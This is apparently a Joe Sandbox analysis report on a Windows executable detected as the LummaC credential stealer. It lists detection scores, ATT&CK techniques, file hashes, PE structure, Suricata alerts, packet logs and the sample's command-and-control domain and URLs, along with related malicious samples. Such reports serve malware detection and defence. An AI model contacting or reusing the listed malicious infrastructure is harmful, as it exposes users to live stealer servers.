Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior

Source: Yara match	File source: 00000000.00000003.936332961.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.936548555.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nyojpsdfkawed.exe PID: 7024, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: nyojpsdfkawed.exe PID: 7024, type: MEMORYSTR
Source: Yara match	File source: 0.2.nyojpsdfkawed.exe.d70000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	41 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nyojpsdfkawed.exe	84%	ReversingLabs	Win32.Trojan.LummaStealer
nyojpsdfkawed.exe	77%	Virustotal		Browse
nyojpsdfkawed.exe	100%	Avira	HEUR/AGEN.1314134

Source	Detection	Scanner	Label
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	0%	Avira URL Cloud	safe
https://htardwarehu.icu/Sbdsa	100%	Avira URL Cloud	malware
https://htardwarehu.icu/	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
https://htardwarehu.icu/em	100%	Avira URL Cloud	malware
https://htardwarehu.icu/5	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
htardwarehu.icu	104.21.48.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://htardwarehu.icu/Sbdsa	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/ac/?q=	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.enigmaprotector.com/openU	nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000DD0000.00000040.00000001.01000000.00000003.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937048170.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.909329095.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	nyojpsdfkawed.exe, 00000000.00000003.909329095.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	nyojpsdfkawed.exe, 00000000.00000003.909002856.0000000004087000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937048170.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20w	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937048170.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	nyojpsdfkawed.exe, 00000000.00000003.909329095.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937048170.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	nyojpsdfkawed.exe, 00000000.00000003.909329095.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://htardwarehu.icu/em	nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://htardwarehu.icu/	nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.enigmaprotector.com/	nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000DD0000.00000040.00000001.01000000.00000003.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	nyojpsdfkawed.exe, 00000000.00000003.909002856.0000000004087000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://htardwarehu.icu/5	nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	htardwarehu.icu	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637344
Start date and time:	2025-03-13 14:51:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nyojpsdfkawed.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 53% Number of executed functions: 20 Number of non-executed functions: 105
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.60.203.209, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:52:32	API Interceptor	7x Sleep call for process: nyojpsdfkawed.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	345623.bat	Get hash	malicious	DBatLoader, FormBook	Browse	www.shlomi.app/9rzh/
	ySUB97Jq80.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.shlomi.app/9rzh/
	hQaXUS5gt0.exe	Get hash	malicious	FormBook	Browse	www.newanthoperso.shop/3nis/
	6nA8ZygZLP.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	UhuGtHUgHf.exe	Get hash	malicious	FormBook	Browse	www.enoughmoney.online/z9gb/
	Bill_of_Lading_20250307_pdf.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	Stormwater Works Drawings Spec.js	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	Shipment Delivery No DE0093002-PDF.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/tking3/five/fre.php
	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/fix/five/fre.php
	http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/	Get hash	malicious	HTMLPhisher	Browse	microsoft-sharepoint4543464633.pages.dev/index-2jc93/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
htardwarehu.icu	L0erlgyZ6f.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.21.16.1
	ModMenu.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	SpaceCheatFort.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	noypjksdaw.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	x1D44JHWDf.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
	SecuriteInfo.com.Win32.MalwareX-gen.1567.5483.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	download.php.exe.bin.exe	Get hash	malicious	Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.96.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	nude.jpg.exe.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	nbvtiopwadkkth.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	nngg.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	awkthjjawdtrh.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	nude.jpg.exe.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.136.234
	Built.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	162.159.128.233
	NavaioSecurityTest (2).exe	Get hash	malicious	Unknown	Browse	172.67.223.179
	https://forms.office.com/e/pnG8K1BDns	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	172.66.0.227
	FW New Login on Your ScreenConnect Instance.msg	Get hash	malicious	Unknown	Browse	104.17.24.14
	SecuriteInfo.com.Win64.Malware-gen.16534.10179.exe	Get hash	malicious	Unknown	Browse	162.159.134.233

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	nbvtiopwadkkth.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	awkthjjawdtrh.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	notyhkkadaw.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	104.21.48.1
	NEW_TENDER_LIST.xlsx	Get hash	malicious	Unknown	Browse	104.21.48.1
	MacAddress.xlsm	Get hash	malicious	Unknown	Browse	104.21.48.1
	Arly.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	104.21.48.1
	CheatInjector.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	SoftWare.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	FortniteHack.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	104.21.48.1
	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	104.21.48.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9881823631499245
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nyojpsdfkawed.exe
File size:	1'315'328 bytes
MD5:	b145d8cdf76ef5fe1b151fb42ee5fcc4
SHA1:	cf94af9e8c0e3d6203b3bde36396a4adade7bd90
SHA256:	4c13ebe1361e08fad18d8bb5ee8377d0518ce03a2592b5784e023703d2e3ba9c
SHA512:	9baefb48b1cfcfcc4c03e988d7c56875c52b62c3bc968e2c68b28fe5d7f19f443fc6c7e8ab1e72c74f8b57b5a50ce7bfa7b535ea751375e817c28c558c23cfec
SSDEEP:	24576:uPoUeGkMK+1OtjY7c3XKW1tbdhgfOGuLBxm3lx5nGpPruIarKw+mAcumfD0Oq2l5:uQNPjptLKYXcNuLOjkiKw4cuw0O/l1O8
TLSH:	4B55332B73E70CE3D8BEC87AE5609A5412741B9BDB4AF5A85D485C7C98257CE18333B0
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....3.g..........................................@...........................<...........@................................. 0.....

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4183cf
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D03381 [Tue Mar 11 12:58:41 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	71cc5af9daad65e58c6f29c42cdf9201

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00401000h
call 00007F11C4E4C3E6h
call far 5DE5h : 8B10C483h
jmp 00007F11C51FB73Ah
sub eax, 0AA789D3h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e3020	0x214	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e3000	0xc	.data
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x4e000	0x29000	ac3e55416a0b9dc9c82a1d213f128081	False	0.9982136051829268	data	7.997908308660158	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x4f000	0x3000	0x1000	0ffa42f4259f9ed6c1d60d3b7d0e9f05	False	0.9990234375	data	7.932863830219209	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x52000	0xe000	0x3200	e425f7f756bac5b20e4ba19e733061db	False	0.985078125	data	7.955753340921395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x60000	0x4000	0x2400	4fff1f1fb7f9ff19d46d77c0406e177c	False	0.9568142361111112	OpenPGP Public Key	7.8544979878199355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x64000	0x27f000	0x2ba00	b568dab2593fdd776b1245f825cb284e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x2e3000	0xe6000	0xe5e00	756d66d78a2435f8f6f9012e52e18525	False	0.996156411432844	MacBinary, char. code 0x2e, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040, creator ' 0.', type ' 1.', 3682606 bytes "." , at 0x3831ae 15740974 bytes resource dBase III DBT, version number 0, next free block index 3027316, 1st item "\211\371a2C\211\014\247\306\205\314"	7.979325866092819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll	MessageBoxA
advapi32.dll	RegCloseKey
oleaut32.dll	SysFreeString
gdi32.dll	CreateFontA
shell32.dll	ShellExecuteA
version.dll	GetFileVersionInfoA
ole32.dll	CoCreateInstance

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T14:52:32.430508+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49682	104.21.48.1	443	TCP
2025-03-13T14:52:34.928081+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49683	104.21.48.1	443	TCP
2025-03-13T14:52:37.629288+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49684	104.21.48.1	443	TCP
2025-03-13T14:52:39.953860+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49685	104.21.48.1	443	TCP
2025-03-13T14:52:42.828983+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49686	104.21.48.1	443	TCP
2025-03-13T14:52:45.629853+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49687	104.21.48.1	443	TCP
2025-03-13T14:52:49.890414+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49689	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 14:52:31.090893030 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:31.090939045 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:31.091044903 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:31.094809055 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:31.094820976 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:32.430349112 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:32.430507898 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:32.433466911 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:32.433482885 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:32.433883905 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:32.481496096 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:32.489610910 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:32.489610910 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:32.489779949 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.361638069 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.374033928 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.374063969 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.374092102 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.374118090 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.374135971 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.374135971 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.374154091 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.374195099 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.374201059 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.381059885 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.381150961 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.381164074 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.389823914 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.389885902 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.389897108 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.408961058 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.409070969 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.424371004 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.424403906 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.424468994 CET	49682	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.424475908 CET	443	49682	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.743235111 CET	49683	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.743294001 CET	443	49683	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:33.743376017 CET	49683	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.743750095 CET	49683	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:33.743765116 CET	443	49683	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:34.927963018 CET	443	49683	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:34.928081036 CET	49683	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:34.929464102 CET	49683	443	192.168.2.8	104.21.48.1
